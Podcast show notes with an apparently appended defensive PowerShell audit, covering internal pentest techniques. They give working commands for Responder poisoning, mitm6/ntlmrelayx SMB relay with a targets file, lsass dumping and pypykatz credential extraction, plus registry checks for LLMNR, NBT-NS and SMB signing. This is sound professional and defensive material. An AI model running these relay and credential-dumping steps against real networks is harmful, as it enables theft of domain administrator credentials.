7MS #423: Tales of Internal Pentest Pwnage - Part 18 - a podcast by Brian Johnson
from 2020-07-15T14:54:54
This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

- Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
- Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
- Testing for MS14-025 is easy with this site.
- mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:

    smb://CORP\Administrator@192.168.195.2
    smb://CORP\Administrator@192.168.195.3
    smb://CORP\brian.admin@192.168.195.7
    192.168.195.7
    192.168.195.10

  Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin
- I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working, so I ended up trying the binary version and then it worked like a champ!
- Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, clicking the Details tab, then right-clicking lsass.exe and choosing Create dump file, and bam, done.
- Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share
- Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

    pip3 install pypykatz
    sudo pypykatz lsa minidump lsass.dmp > lsass.txt

  Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to munch on!
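Added here as the defender's counterpart to the Responder and ntlmrelayx items above (this is not from the episode or its notes): a PowerShell audit of the host settings that blunt LLMNR/NBT-NS poisoning and SMB NTLM relay. It reads the standard Windows registry locations for those controls and assumes an elevated session on the host being checked.

```powershell
# Added defensive check (not from the episode): read the registry-backed settings that
# mitigate LLMNR/NBT-NS poisoning (what Responder feeds on) and SMB NTLM relay (ntlmrelayx).
# Run in an elevated PowerShell session. A $null value means "not configured", i.e. the
# insecure Windows default is in effect.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

$findings = @()

# LLMNR: EnableMulticast = 0 under the DNSClient policy key disables it.
$llmnr = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast'
$findings += [pscustomobject]@{
    Control = 'LLMNR disabled'
    Value   = $llmnr
    Pass    = ($llmnr -eq 0)
}

# NBT-NS: NetbiosOptions = 2 on every interface disables NetBIOS over TCP/IP.
$ifaces = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
$nbtOn  = @($ifaces | Where-Object { (Get-RegValue $_.PSPath 'NetbiosOptions') -ne 2 })
$findings += [pscustomobject]@{
    Control = 'NBT-NS disabled on all interfaces'
    Value   = "$($nbtOn.Count) interface(s) still enabled"
    Pass    = ($nbtOn.Count -eq 0)
}

# SMB signing: RequireSecuritySignature = 1 on both the server and workstation side
# makes relayed SMB sessions fail, since the relay cannot produce a valid session key.
foreach ($side in 'LanmanServer', 'LanmanWorkstation') {
    $sig = Get-RegValue "HKLM:\SYSTEM\CurrentControlSet\Services\$side\Parameters" 'RequireSecuritySignature'
    $findings += [pscustomobject]@{
        Control = "SMB signing required ($side)"
        Value   = $sig
        Pass    = ($sig -eq 1)
    }
}

$findings | Format-Table -AutoSize
```

Any row with Pass = False is a setting that the techniques in this episode rely on; roll the fix out through Group Policy rather than per host.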